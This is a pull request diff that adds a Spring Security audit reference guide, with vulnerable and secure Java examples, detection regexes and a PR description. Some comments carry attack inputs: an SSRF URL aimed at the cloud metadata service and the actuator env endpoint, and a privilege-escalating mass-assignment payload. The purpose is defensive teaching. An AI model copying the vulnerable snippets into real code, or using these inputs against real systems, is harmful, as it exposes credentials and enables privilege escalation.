+            .oauth2ResourceServer(oauth2 -> oauth2.jwt(Customizer.withDefaults()));
+        return http.build();
+    }
+
+    @Bean
+    @Order(2)
+    public SecurityFilterChain webFilterChain(HttpSecurity http) throws Exception {
+        http
+            .csrf(csrf -> csrf
+                .csrfTokenRepository(CookieCsrfTokenRepository.withHttpOnlyFalse())
+                .csrfTokenRequestHandler(new XorCsrfTokenRequestAttributeHandler()))
+            .authorizeHttpRequests(auth -> auth.anyRequest().authenticated())
+            .formLogin(Customizer.withDefaults());
+        return http.build();
+    }
+}
+```
+
+**Detection regex:** `csrf\s*\(\s*(?:csrf|c)\s*->\s*(?:csrf|c)\.disable\s*\(\s*\)\s*\)|\.csrf\(\)\.disable\(\)`
+**Severity:** warning
+
+When CSRF is disabled, verify the endpoint chain is stateless (JWT/OAuth2 bearer tokens). CSRF disabling for session-based endpoints is a critical vulnerability.
+
+### Mass Assignment via @ModelAttribute
+
+```java
+// VULNERABLE: Binding all request parameters to entity
+@Controller
+public class UserController {
+
+    @PostMapping("/users/update")
+    public String updateProfile(@ModelAttribute User user) {
+        // Attacker can submit: role=ADMIN&enabled=true&id=1
+        userRepository.save(user);
+        return "redirect:/profile";
+    }
+}
+
+// Entity without binding restrictions
+@Entity
+public class User {
+    @Id private Long id;
+    private String name;
+    private String email;
+    private String role;      // Attacker can escalate privileges
+    private boolean enabled;  // Attacker can re-enable disabled accounts
+}
+
+// SECURE: Use a DTO with explicit fields
+public record UserUpdateDto(
+    @NotBlank @Size(max = 100) String name,
+    @Email String email
+) {}
+
+@Controller
+public class UserController {
+
+    @PostMapping("/users/update")
+    public String updateProfile(@Valid @RequestBody UserUpdateDto dto,
+                                Authentication auth) {
+        User user = userRepository.findByUsername(auth.getName())
+            .orElseThrow();
+        user.setName(dto.name());
+        user.setEmail(dto.email());
+        // role and enabled are never exposed to user input
+        userRepository.save(user);
+        return "redirect:/profile";
+    }
+}
+
+// ALTERNATIVE: Use @InitBinder to restrict bound fields
+@Controller
+public class UserController {
+
+    @InitBinder
+    public void initBinder(WebDataBinder binder) {
+        binder.setAllowedFields("name", "email");
+    }
+}
+```
+
+**Detection regex:** `@ModelAttribute\s+(?!.*Dto|.*Request|.*Form|.*Command)\w+\s+\w+`
+**Severity:** warning
+
+### RestTemplate / WebClient SSRF
+
+```java
+// VULNERABLE: User-controlled URL passed to RestTemplate
+@RestController
+public class ProxyController {
+
+    private final RestTemplate restTemplate = new RestTemplate();
+
+    @GetMapping("/fetch")
+    public ResponseEntity<String> fetch(@RequestParam String url) {
+        // Attacker sends: url=http://169.254.169.254/latest/meta-data/
+        // or url=http://localhost:8080/actuator/env
+        String result = restTemplate.getForObject(url, String.class);
+        return ResponseEntity.ok(result);
+    }
+}
+
+// SECURE: Validate and restrict target URLs
+@RestController
+public class ProxyController {
+
+    private final RestTemplate restTemplate;
+    private static final Set<String> ALLOWED_HOSTS = Set.of(
+        "api.trusted-service.com",
+        "cdn.trusted-service.com"
+    );
+
+    @GetMapping("/fetch")
+    public ResponseEntity<String> fetch(@RequestParam String url) {
+        URI uri = URI.create(url);
+
+        // Validate scheme
+        if (!"https".equals(uri.getScheme())) {
+            return ResponseEntity.badRequest().body("Only HTTPS allowed");
+        }
+
+        // Validate host against allowlist
+        if (!ALLOWED_HOSTS.contains(uri.getHost())) {
+            return ResponseEntity.badRequest().body("Host not allowed");
+        }
+
+        // Block private/internal IPs
+        InetAddress address = InetAddress.getByName(uri.getHost());
+        if (address.isLoopbackAddress() || address.isSiteLocalAddress()
+                || address.isLinkLocalAddress()) {
+            return ResponseEntity.badRequest().body("Internal addresses not allowed");
+        }
+
+        String result = restTemplate.getForObject(uri, String.class);
+        return ResponseEntity.ok(result);
+    }
+}
+```
+
+**Detection regex:** `(?:restTemplate|webClient|RestTemplate|WebClient)[\s\S]{0,60}(?:getForObject|getForEntity|exchange|retrieve|post|get|put|delete)\s*\(\s*(?!")[^)]*(?:request|param|input|url|uri|href|link|endpoint)`
+**Severity:** error
+
+## Data Exposure
+
+### Sensitive Data in Spring Responses
+
+```java
+// VULNERABLE: Returning JPA entity directly — exposes all fields
+@RestController
+@RequestMapping("/api/users")
+public class UserController {
+
+    @GetMapping("/{id}")
+    public User getUser(@PathVariable Long id) {
+        // Returns: {"id":1,"name":"Alice","password":"$2a$10$...","ssn":"123-45-6789",...}
+        return userRepository.findById(id).orElseThrow();
+    }
+}
+
+// SECURE: Use a response DTO with explicit fields
+public record UserResponse(Long id, String name, String email, String role) {
+
+    public static UserResponse from(User user) {
+        return new UserResponse(user.getId(), user.getName(),
+                                user.getEmail(), user.getRole());
+    }
+}
+
+@RestController
+@RequestMapping("/api/users")
+public class UserController {
+
+    @GetMapping("/{id}")
+    public UserResponse getUser(@PathVariable Long id) {
+        User user = userRepository.findById(id).orElseThrow();
+        return UserResponse.from(user);
+    }
+}
+
+// ALTERNATIVE: Use @JsonIgnore on sensitive fields (less recommended)
+@Entity
+public class User {
+    @Id private Long id;
+    private String name;
+    @JsonIgnore private String password;
+    @JsonIgnore private String ssn;
+}
+```
+
+**Detection regex:** `@GetMapping[\s\S]{0,200}return\s+\w+Repository\.find`
+**Severity:** warning
+
+## Detection Patterns for Spring
+
+```java
+// Grep patterns for Spring security issues:
+String[] springPatterns = {
+    "permitAll\\(\\)",                            // Verify scope of permitAll
+    "csrf.*disable",                              // CSRF disabled
+    "enableDefaultTyping",                        // Jackson unsafe deserialization
+    "parseExpression\\(",                         // SpEL evaluation
+    "include.*\\*",                               // Actuator wildcard exposure
+    "@ModelAttribute\\s+(?!.*Dto)",               // Mass assignment risk
+    "restTemplate.*getForObject.*\\$",            // SSRF via RestTemplate
+    "@PreAuthorize",                              // Verify @EnableMethodSecurity present
+    "return.*Repository\\.find",                  // Entity exposure in response
+    "new ObjectInputStream",                      // Java deserialization
+};
+```
+
+---
+
+## Remediation Priority
+
+| Finding | Severity | Remediation Timeline | Effort |
+|---------|----------|---------------------|--------|
+| SpEL injection (SA-SPRING-02) | Critical | Immediate | Medium |
+| Actuator exposure (SA-SPRING-03) | Critical | Immediate | Low |
+| Jackson default typing (SA-SPRING-08) | Critical | Immediate | Medium |
+| RestTemplate SSRF (SA-SPRING-09) | Critical | Immediate | Medium |
+| permitAll overreach (SA-SPRING-01) | High | 1 week | Low |
+| Thymeleaf SSTI (SA-SPRING-06) | High | 1 week | Medium |
+| CSRF disabled (SA-SPRING-04) | High | 1 week | Low |
+| @PreAuthorize bypass (SA-SPRING-05) | High | 1 week | Low |
+| Mass assignment (SA-SPRING-07) | Medium | 1 month | Medium |
+| Entity exposure (SA-SPRING-10) | Medium | 1 month | Medium |
+
+## Related References
+
+- `owasp-top10.md` — OWASP Top 10 mapping
+- `java-security.md` — Java language-level patterns (deserialization, JNDI)
+- `dotnet-security.md` — Comparison with ASP.NET Core patterns
+
+## Changelog
+
+| Date | Change | Reason |
+|------|--------|--------|
+| 2026-03-31 | Initial release | Phase 3 — framework security references |

--- a/skills/security-audit/references/spring-security.md
+++ b/skills/security-audit/references/spring-security.md
@@ -4,7 +4,7 @@ Security patterns, common misconfigurations, and detection regexes for Spring Bo
 
 ## Authentication & Authorization
 
-### Spring Security Misconfiguration — permitAll Overreach
+### Spring Security Misconfiguration - permitAll Overreach
 
 ```java
 // VULNERABLE: Over-permissive security configuration
@@ -181,7 +181,7 @@ public class PageController {
 **Detection regex:** `return\s+(?:request|param|input|query|\w+)\s*;[\s\S]{0,5}$|return\s+"[^"]*"\s*\+\s*(?:request|param|input|\w+)`
 **Severity:** error
 
-### Jackson Deserialization — Polymorphic Typing
+### Jackson Deserialization - Polymorphic Typing
 
 ```java
 // VULNERABLE: Default typing enabled globally
@@ -232,7 +232,7 @@ public abstract class Notification {
 ### Actuator Endpoint Exposure
 
 ```yaml
-# VULNERABLE: application.yml — all actuator endpoints exposed without auth
+# VULNERABLE: application.yml - all actuator endpoints exposed without auth
 management:
   endpoints:
     web:
@@ -284,7 +284,7 @@ public class SecurityConfig {
 **Detection regex:** `include\s*:\s*["']?\*["']?|exposure\.include\s*=\s*\*`
 **Severity:** error
 
-### CSRF Configuration — Unsafe Disabling
+### CSRF Configuration - Unsafe Disabling
 
 ```java
 // VULNERABLE: CSRF protection disabled entirely
@@ -369,11 +369,14 @@ public record UserUpdateDto(
     @Email String email
 ) {}
 
+// Form-binding variant (replaces the @ModelAttribute example above).
+// Keeps the Controller-returns-view-name shape so it is a drop-in
+// mitigation for the mass-assignment bug, not a different feature.
 @Controller
 public class UserController {
 
     @PostMapping("/users/update")
-    public String updateProfile(@Valid @RequestBody UserUpdateDto dto,
+    public String updateProfile(@Valid @ModelAttribute UserUpdateDto dto,
                                 Authentication auth) {
         User user = userRepository.findByUsername(auth.getName())
             .orElseThrow();
@@ -382,6 +385,22 @@ public class UserController {
         // role and enabled are never exposed to user input
         userRepository.save(user);
         return "redirect:/profile";
+    }
+}
+
+// REST variant — same allowlist DTO, different response style.
+@RestController
+public class UserApiController {
+
+    @PostMapping("/api/users/update")
+    public ResponseEntity<Void> updateProfile(@Valid @RequestBody UserUpdateDto dto,
+                                              Authentication auth) {
+        User user = userRepository.findByUsername(auth.getName())
+            .orElseThrow();
+        user.setName(dto.name());
+        user.setEmail(dto.email());
+        userRepository.save(user);
+        return ResponseEntity.noContent().build();
     }
 }
 
@@ -545,7 +564,7 @@ String[] springPatterns = {
 ## Related References
 
 - `owasp-top10.md` — OWASP Top 10 mapping
-- `java-security.md` — Java language-level patterns (deserialization, JNDI)
+- `java-security-features.md` — Java language-level patterns (deserialization, JNDI)
 - `dotnet-security.md` — Comparison with ASP.NET Core patterns
 
 ## Changelog


### PR DESCRIPTION
## Summary

Tier 2 ecosystem PR — JVM + .NET. Five new standalone reference guides (~2,840 lines total):

- **`java-security-features.md`**: Java 11–21 — `ObjectInputFilter` (Java 9+), sealed classes, pattern matching, `record`-based DTOs, JNDI/Log4Shell patterns, JDBC `PreparedStatement`, `DocumentBuilderFactory` XXE hardening, reflection abuse, SSRF, weak crypto detection
- **`spring-security.md`**: Spring Security 6.x — lambda DSL, CORS, method security, CSRF, OAuth2, JWT, Jackson polymorphic deserialization, actuator hardening
- **`csharp-security-features.md`**: C# 11/12 — raw strings, file-scoped types, required members, nullability, `Path.Combine` traversal, `System.Text.Json` polymorphic binding
- **`dotnet-security.md`**: ASP.NET Core — middleware ordering, Data Protection API, antiforgery, authZ policies, rate limiter
- **`blazor-security.md`**: Blazor Server vs WASM threat model, auth providers, `IJSRuntime` interop, SignalR auth, `Protected*Storage` semantics

Each guide has vulnerable vs secure examples and detection regex hints.

## Provenance

Imported from [evandervecht/security-audit-skill](https://github.com/evandervecht/security-audit-skill). Dual-licensed MIT + CC-BY-SA-4.0. Fork-specific `SA-JAVA-*` / `SA-SPRING-*` / `SA-CS-*` / `SA-DOTNET-*` / `SA-BLAZOR-*` checkpoint IDs stripped.

Attribution: [E van der Vecht](mailto:evandervecht@schubergphilis.com).

## Review-round-2 note

The original description named String Templates and JEP 411 (Security Manager deprecation). Those topics are not in the imported file — I have corrected the bullet above to match what the guide actually covers. Adding those JEPs can be a separate follow-up PR.

## Test plan

- [ ] CI green
- [ ] References render in GitHub preview